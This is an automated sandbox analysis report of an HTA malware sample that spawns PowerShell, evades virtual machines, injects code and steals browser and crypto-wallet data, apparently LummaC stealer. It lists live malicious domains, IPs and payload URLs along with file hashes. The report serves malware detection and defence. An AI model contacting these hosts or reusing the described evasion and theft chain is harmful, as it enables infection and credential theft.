                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Process Injection
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581902 Sample: Winter.mp4.hta Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 27 crackerdolk.click 2->27 29 cdn1.klipbazyxui.shop 2->29 31 cegu.shop 2->31 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 11 other signatures 2->47 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 57 Suspicious powershell command line found 9->57 12 powershell.exe 18 9->12         started        process6 signatures7 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->59 61 Found many strings related to Crypto-Wallets (likely being stolen) 12->61 63 Bypasses PowerShell execution policy 12->63 65 2 other signatures 12->65 15 powershell.exe 15 16 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 37 cdn1.klipbazyxui.shop 104.21.72.190, 443, 49709 CLOUDFLARENETUS United States 15->37 39 Injects a PE file into a foreign processes 15->39 21 powershell.exe 15->21         started        25 conhost.exe 15->25         started        signatures10 process11 dnsIp12 33 crackerdolk.click 104.21.80.1, 443, 49931, 49936 CLOUDFLARENETUS United States 21->33 35 cegu.shop 185.161.251.21, 443, 49982 NTLGB United Kingdom 21->35 49 Query firmware table information (likely to detect VMs) 21->49 51 Found many strings related to Crypto-Wallets (likely being stolen) 21->51 53 Tries to harvest and steal browser information (history, passwords, etc) 21->53 55 2 other signatures 21->55 signatures13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Winter.mp4.hta3%VirustotalBrowse
                Winter.mp4.hta0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://cdn1.klipbazyxui.shop0%Avira URL Cloudsafe
                https://cegu.shop/100%Avira URL Cloudmalware
                https://klipvumisui.shop/int_clp_sha.txts=Rc100%Avira URL Cloudmalware
                https://dfgh.online/invoker.php?compName=0%Avira URL Cloudsafe
                https://crackerdolk.click/api-0%Avira URL Cloudsafe
                http://crl.microsoftkC00%Avira URL Cloudsafe
                https://crackerdolk.click/api0%Avira URL Cloudsafe
                https://crackerdolk.click/r0%Avira URL Cloudsafe
                https://crackerdolk.click/0%Avira URL Cloudsafe
                https://cdn1.klipbazyxui.shop/vankok.vstx0%Avira URL Cloudsafe
                https://klipvumisui.shop/int_clp_sha.txtZR100%Avira URL Cloudmalware
                https://cegu.shop/8574262446/ph.txt100%Avira URL Cloudmalware
                https://crackerdolk.click/i0%Avira URL Cloudsafe
                https://klipvumisui.shop/int_clp_sha.txt100%Avira URL Cloudmalware
                https://crackerdolk.click/apiH0%Avira URL Cloudsafe
                https://crackerdolk.click/wn0%Avira URL Cloudsafe
                crackerdolk.click0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                cegu.shop
                185.161.251.21
                truefalse
                  high
                  crackerdolk.click
                  104.21.80.1
                  truetrue
                    unknown
                    cdn1.klipbazyxui.shop
                    104.21.72.190
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      scentniej.buzzfalse
                        high
                        https://crackerdolk.click/apitrue
                        • Avira URL Cloud: safe
                        unknown
                        rebuildeso.buzzfalse
                          high
                          appliacnesot.buzzfalse
                            high
                            screwamusresz.buzzfalse
                              high
                              cashfuzysao.buzzfalse
                                high
                                inherineau.buzzfalse
                                  high
                                  https://cdn1.klipbazyxui.shop/vankok.vstxtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  prisonyfork.buzzfalse
                                    high
                                    https://cegu.shop/8574262446/ph.txtfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    hummskitnj.buzzfalse
                                      high
                                      crackerdolk.clicktrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cdn1.klipbazyxui.shoppowershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://stackoverflow.com/q/14436606/23354powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://github.com/mgravell/protobuf-netJpowershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.microsoftkC0powershell.exe, 00000002.00000002.2152519562.0000000007930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://crackerdolk.click/powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://klipvumisui.shop/int_clp_sha.txts=Rcpowershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://github.com/mgravell/protobuf-netpowershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://cegu.shop/powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://crackerdolk.click/rpowershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://dfgh.online/invoker.php?compName=powershell.exe, 00000008.00000002.4465996133.0000000004C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4465916292.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://crackerdolk.click/api-powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://crackerdolk.click/ipowershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://klipvumisui.shop/int_clp_sha.txtZRpowershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://github.com/mgravell/protobuf-netipowershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://crackerdolk.click/wnpowershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://stackoverflow.com/q/2152978/23354powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore6lBjqpowershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://crackerdolk.click/apiHpowershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://klipvumisui.shop/int_clp_sha.txtpowershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      185.161.251.21
                                                                      cegu.shopUnited Kingdom
                                                                      5089NTLGBfalse
                                                                      104.21.72.190
                                                                      cdn1.klipbazyxui.shopUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      104.21.80.1
                                                                      crackerdolk.clickUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1581902
                                                                      Start date and time:2024-12-29 09:22:10 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 52s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:9
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Winter.mp4.hta
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winHTA@9/6@3/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:
                                                                      • Successful, ratio: 90%
                                                                      • Number of executed functions: 139
                                                                      • Number of non-executed functions: 71
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .hta
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                      • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 172.202.163.200, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target mshta.exe, PID 2000 because there are no executed function
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6624 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      03:23:00API Interceptor93x Sleep call for process: powershell.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      185.161.251.21MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                          !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            @Setup.exeGet hashmaliciousLummaCBrowse
                                                                              Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                    104.21.80.1SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.dejikenkyu.cyou/pmpa/
                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                    • hiranetwork.com/administrator/index.php
                                                                                    downloader2.htaGet hashmaliciousXWormBrowse
                                                                                    • 2k8u3.org/wininit.exe
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    cegu.shopMdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    crackerdolk.clickBagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSMdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.208.58
                                                                                    rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.32.1
                                                                                    Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                    • 172.67.165.100
                                                                                    https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.77.48
                                                                                    EjS7Q5fFCE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 172.67.186.200
                                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 172.67.160.84
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 172.67.160.84
                                                                                    aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 172.67.132.55
                                                                                    https://belasting.online-factuur.comGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.171.151
                                                                                    NTLGBMdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 81.97.105.115
                                                                                    installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 163.165.65.186
                                                                                    xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 92.237.44.174
                                                                                    CLOUDFLARENETUSMdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.208.58
                                                                                    rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.32.1
                                                                                    Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                    • 172.67.165.100
                                                                                    https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.77.48
                                                                                    EjS7Q5fFCE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 172.67.186.200
                                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 172.67.160.84
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 172.67.160.84
                                                                                    aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 172.67.132.55
                                                                                    https://belasting.online-factuur.comGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.171.151
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0eaYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.72.190
                                                                                    aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.72.190
                                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 104.21.72.190
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 104.21.72.190
                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.72.190
                                                                                    FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.72.190
                                                                                    tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.72.190
                                                                                    lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.21.72.190
                                                                                    Titan.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.72.190
                                                                                    Titan.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.72.190
                                                                                    a0e9f5d64349fb13191bc781f81f42e1MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    • 185.161.251.21
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):5829
                                                                                    Entropy (8bit):4.901113710259376
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1328
                                                                                    Entropy (8bit):5.425567665064823
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3KnWSKco4KmM6GjKbm51s4RPQoUebIKo+mZ9t7J0gt/NK3R8UHr8H8g:WWSU4YymI4RIoUeW+mZ9tK8NWR8WZg
                                                                                    MD5:23BDC1228577C8247142F55D4FB7D3BA
                                                                                    SHA1:109BF9F25AC85393295C6266504A824CAF9202E7
                                                                                    SHA-256:96993857399EF5C4A7F5533BAD749D9B1FF7BA6ACBC2D3092F670FD6C9B5B552
                                                                                    SHA-512:6A92414292C545CCF66AF3C4EFC8187A915B6F00A50235DE16EFAF3E77C0D1F540D1394FC485AD90ECE47834B114E937708A7423AAF6465233C8FFE74B349F38
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:@...e.................................X..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    File type:data
                                                                                    Entropy (8bit):6.038915304329873
                                                                                    TrID:
                                                                                      File name:Winter.mp4.hta
                                                                                      File size:612'683 bytes
                                                                                      MD5:dd408ffa842e697a71fa466966538cb4
                                                                                      SHA1:2eeb41877f0eae3ea95de8981684955111f26255
                                                                                      SHA256:84b473ab26ef4382c0ad60ad93b780e0564245f9b1fffe28a3248b0c7d2470cd
                                                                                      SHA512:cb0e59732c50dd2787ffefd65d7e2e1b839dfe66b4eca1a0198dddde2e1165c72fe5e447a30923ff4376f04765cd7b8291e2ef5e1631e711a3f7b86d53e240e7
                                                                                      SSDEEP:6144:Fg+kS4ewCXTL68uH/9ecepRCERj+ReiebqAAH:WV
                                                                                      TLSH:F4D4C2465A73061598BCC964EED7CA2E2071BDCC4C0687AE4ACDB435305B8B47EE69FC
